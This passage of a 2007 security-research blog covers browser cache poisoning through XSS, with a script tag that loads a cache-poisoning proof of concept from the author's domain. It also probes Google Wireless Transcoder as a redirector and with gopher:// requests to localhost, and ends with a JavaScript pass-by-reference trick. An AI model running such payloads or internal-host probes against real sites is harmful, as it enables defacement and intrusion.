javascript:document.write("content");document.close();

using the javascript: URI on the target webpage.

This was very interesting, because it meant that you could modify the cached version of any webpage in a domain that you have access to, so for example if a website has an XSS bug anywhere on the website..

http://www.victim.com/this/website/is/vulnerable.php

it will be able to modify the cached version of www.victim.com/index.

This is done in a very simple way; I've uploaded a PoC, so you can test it on any website using..
<script src="//sirdarckcat.net/cache_poisoning.js"></script>

This code will open a window to the current directory index, and 5 seconds later it will modify the cached version of the webpage.

Once you enter that website and hit refresh, the content won't change, because the cached version of the website is the one generated by the JavaScript code.

As I was investigating this, Mario Heiderich explained to me that this type of attack may be used for confusing site owners to obfuscate the real attack, like reporting a minor vuln to draw attention while exploiting the grave flaw.

Anyway, while talking about this with Giorgio Maone, this (apparently) is the browser's desired behavior (to save the JavaScript-generated code in the cache), so this is not a bug, it's a feature!

The impact has already been explained by Mario Heiderich, and another possible attack could be to make a fake deface of a website index; anyway, I'm impressed that this is actually what the web browser wants.

Thursday, July 26, 2007

Playing with Google Wireless Transcoder

Last week, I found Google Wireless Transcoder, and I started playing with it, trying to find an XSS bug in the HTML "transcoder", and I shared it with Ronald, RSnake and .mario.
What the Google Wireless Transcoder does is pretty simple: it gets HTML code and translates it into mobile-compliant XHTML code.
The way it works is a little mysterious (it's made in Java b.t.w.).. It could be something similar to HTML Purifier (this was pointed out by .mario), but I would say that it works as a server-side browser that generates valid XHTML code by reconstructing the DOM.. (which in fact is not very difficult to do).. I think this because there are some errors very similar to other Java browsers, like jrex.. or jakarta (the GWT supports ftp:// gopher:// http:// among others..), for example:

This is an exception generated by this code:

http://jakarta.apache.org/commons/httpclient/xref/org/apache/commons/httpclient/HttpHost.html

So this makes me believe that they (at least) use HttpHost.java.
They also use BASE64DecoderStream.java.

Anyway, there are some other errors, like this one:

This is an exception generated by Firefox because GWT returned invalid XHTML.. This is interesting, because it demonstrates that in some way the GWT supports the javascript: URI.
(This website is googlr.com, a mirror of google.com, used to avoid the session generated at google.com.)

We can also see that GWT can be used as a "redirector", like:
http://www.google.com/gwt/n?u=http://www.vidoblog.net/ip/&_gwt_pg=orig

Note the _gwt_pg parameter.

We can also temporarily host images; we just need to enter any website that contains images (like google.com):
http://www.google.com/gwt/n?u=www.google.com
and the logo will have a URL similar to:
http://www.google.com/gwt/i?i=01F8441E4_F9610322_4DB7F91D

Another interesting thing that RSnake pointed out is that these "internal proxies" are "logically separated from their internal addresses." Anyway, I found it very interesting that:

http://www.google.com/gwt/n?u=gopher://local.sirdarckcat.net
http://www.google.com/gwt/n?u=gopher://unexistent

returns something different from:

http://www.google.com/gwt/n?u=gopher://127.0.0.1
http://www.google.com/gwt/n?u=gopher://localhost
http://www.google.com/gwt/n?u=gopher://localhostABCD

Even though local.sirdarckcat.net and localhost (supposedly) point to 127.0.0.1, localhostABCD doesn't. So why is gopher://unexistent different from gopher://localhostABCD? Maybe it's a way to prevent an attacker from contacting 127.0.0.1..

We could try to enumerate the "alive" hosts with local.sirdarckcat.net:port#, but as far as I tested, all ports return the same.

Something else that was discovered was that GWT parses data URIs.

http://www.google.com/gwt/n?u=data:text/html;base64,PGh0bWw%2BDQo8aGVhZD4NCjx0aXRsZT5IZWxsbyBXb3JsZDwvdGl0bGU%2BDQo8L2hlYWQ%2BDQo8Ym9keT4NCkczDQo8L2JvZHk%2BDQo8L2h0bWw%2B

Pretty amazing; it's the first web proxy (I've seen) that actually parses them..

To finish, I think that GWT is a great tool and has a lot of features (some of them hidden to naive eyes). I think this should be investigated more deeply (for example, the impact of using GWT as an SEO technique, using GWT's PageRank as an inbound link to your site).

Greetz!!

Saturday, July 07, 2007

Passing Variables by Reference in JavaScript

A long time ago, when I was learning C and understood the use of pointers, I started wondering whether there was a way to pass JavaScript variables by reference.
I had a lot of ideas, but they didn't work as expected.

For example, for global variables in a browser, I could use:

function modifyVar(varName,newVal){
window[varName]=newVal;
}
var x=123;
alert(x);
modifyVar("x",321);
alert(x);


Anyway, this was only valid for "global" variables..

Then I thought about using caller.call (even though it is not exportable).

function modifyVar(varName,newVal){
modifyVar.caller.call(eval,varName+"="+newVal);
}
var x=123;
alert(x);
modifyVar("x",321);
alert(x);

Anyway, this didn't work either; there was a strange error named "Too much recursion".

Then, a long time after that (actually.. yesterday), I realized that objects in JavaScript are passed by reference, so..

function modifyVar(obj,newVal){
// the object is shared, so writing a property on it is visible to the caller
obj.value=newVal;
}
var m={value: 1};
alert(m.value);
modifyVar(m,321);
alert(m.value);


and the attribute was modified successfully :).


Anyway, this wasn't good enough; I wanted to be able to send a variable as a parameter in an instruction and be able to modify its content inside the function.

That's when I realized (after some testing) that I can set any variable as an object and allow it to have any primitive value I want, for example:

var w=Object("some string");


will behave just like:

var w="some string";


and that:

var w=Object(123);


will behave just like:

var w=123;


and the same goes for regular expressions, functions, other objects, etc..

So by means of this, I was able to transform any variable into a "referenceable" variable.

Anyway, to modify this variable I couldn't use any assignment operators, because they would destroy the Object.. I needed to modify its contents from "inside", using its methods.

So I found three methods that returned the value of an object:
  • toSource();
  • toString();
  • valueOf();

The last one is the most important, since its value is the one that will be treated "officially", except for string and source operations.. so by doing:

function modifyVar(obj,val){
obj.valueOf=obj.toSource=obj.toString=function(){return val}
}


we would actually be modifying the value of "obj".

Anyway, this still wasn't enough.. I wanted a way to reference variables as easily as in C or PHP.. so.. why not make a prototype function of Object that allows me to modify the variable..

so I did this:

Object.prototype.$=function $(val){if(val)this.valueOf=this.toSource=this.toString=function(){return val};return val;};

So variable.$("new val"); will modify the content of variable "globally".

Here you can see the way this works:

// Object reference maker
Object.prototype.$=function $(val){if(val)this.valueOf=this.toSource=this.toString=function(){return val};return val;};


function value(variable){
// function to modify the variable through =
variable="new_value";
}

function reference(variable){
//function to modify the variable through reference
variable.$("new_value");
}

var w="standard"; // standard value

w=Object(w);// transform to object.
alert(w); // show that the value is still the same
// standard
value(w); // try to change it's content's via =
alert(w); // show if the content's have been modified
// standard
reference(w); // try to modify the content's via reference
alert(w); // show the new value
// new_value


Hope this is useful for anybody that needs to modify a "private" variable where it's not otherwise accessible.. here is an example of an Object, and a way to modify its private variables (which shouldn't be possible under the OOP paradigm)..

Object.prototype.$=function $(val){if(val)this.valueOf=this.toSource=this.toString=function(){return val};return val;};
function DownTown(){
var private=Object("You cant modify me");
this.get=function(){
return private;
}
this.export=function(callback){
callback(private);
}
}
var blackbox=new DownTown();
alert(blackbox.get());
blackbox.export(function(x){x.$("new val!")});
alert(blackbox.get());
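As an added example (not code from the original post), the same wrapper trick from the reference() demo and the DownTown example above, written without touching Object.prototype, with checks that show where the "reference" illusion stops (coercion sees the new value; === and typeof do not) and how a closure can freeze its private wrapper so an exported callback cannot rewrite it. ref, rewriteThroughReference, rewriteThroughAssignment, probe and DownTownHardened are names introduced here; toSource is left out because it is a non-standard Gecko-only method.

```javascript
// Added example, not from the original post. Runs in Node.js or any ES5+ engine.

// ref(): wrap a primitive so the wrapper itself can be "rewritten" later.
function ref(value) {
  var box = Object(value);          // primitive -> String/Number/Boolean object
  // set() rewrites what coercion sees, like the post's $() does, but as an
  // own method instead of Object.prototype.$, so for-in loops stay clean.
  box.set = function (v) {
    // On a frozen wrapper these assignments are silently ignored (sloppy mode)
    // or throw a TypeError (strict mode); report whether the rewrite took.
    try {
      this.valueOf = this.toString = function () { return v; };
    } catch (e) { /* frozen: fall through to the check below */ }
    return String(this) === String(v);
  };
  return box;
}

// Same as the post's reference(): rewrite through the wrapper's methods.
function rewriteThroughReference(box) { return box.set("new_value"); }

// Same as the post's value(): assignment only rebinds the local name.
function rewriteThroughAssignment(box) { box = "new_value"; return box; }

// Where the illusion ends: coercion sees the new value, identity does not.
function probe(box) {
  return {
    coerced: "" + box,             // toString()/valueOf() -> "new_value"
    loose:   box == "new_value",   // == coerces the object first -> true
    strict:  box === "new_value",  // object vs primitive -> false
    type:    typeof box            // still "object", never "string"
  };
}

// Defender's side of the DownTown example: the closure still hands out its
// private wrapper to callbacks, but frozen, so set() cannot rewrite it.
function DownTownHardened() {
  var secret = Object.freeze(ref("You cant modify me"));
  this.get = function () { return String(secret); };
  this.export = function (cb) { cb(secret); };
}
```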